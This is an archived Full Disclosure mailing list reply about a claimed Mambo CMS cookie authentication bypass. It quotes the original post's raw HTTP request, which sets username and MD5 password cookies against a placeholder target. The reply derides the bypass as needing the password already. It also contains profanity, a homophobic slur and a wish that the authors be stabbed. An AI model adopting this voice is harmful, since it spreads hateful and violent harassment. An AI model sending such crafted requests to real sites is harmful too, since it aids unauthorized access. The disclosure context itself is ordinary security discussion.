Full Disclosure mailing list archives
Re: Mambo Cookie Authentication Bypass Exploit
From: crunkd () hushmail com
Date: Tue, 10 Jun 2008 17:05:31 +1000
So to perform this 'bypass' you need the password in the first place? You absolute fucking morons, the security scene is not for you. I hope someone stabs you over a food stamp. Faggots. ------------------------------------------------------------ Halabaluza Team Halabaluza Team halabaluza.team at gmail.com Sun Jun 8 12:29:56 BST 2008 * Previous message: [Full-disclosure] avira update.exe * Next message: [Full-disclosure] [ GLSA 200806-03 ] Imlib 2: User-assisted execution of arbitrary code * Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] for mambo <= 4.5.5 and <= 4.6.2 maybe others GET http://[TARGET]/index.php Host: [TARGET] User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/ plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Connection: keep-alive Cookie: usercookie[username]=[USERNAME];usercookie[password]=[MD5] Cache-Control: max-age=0 FREE TIBET! -- Smart Girls Secret Weapon Read Unbiased Beauty Product Reviews, Get Helpful Tips, Tricks and Sam http://tagline.hushmail.com/fc/JKFkuIjyaUM3E9zcp2f7ppavbouTIiiPdCquThperfoYTGho1dzYFq/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Mambo Cookie Authentication Bypass Exploit Halabaluza Team Halabaluza Team (Jun 09)
- <Possible follow-ups>
- Re: Mambo Cookie Authentication Bypass Exploit crunkd (Jun 10)
- Re: Mambo Cookie Authentication Bypass Exploit Garrett M. Groff (Jun 10)
- Re: Mambo Cookie Authentication Bypass Exploit Brian Kim (Jun 10)
- Re: Mambo Cookie Authentication Bypass Exploit crunkd (Jun 11)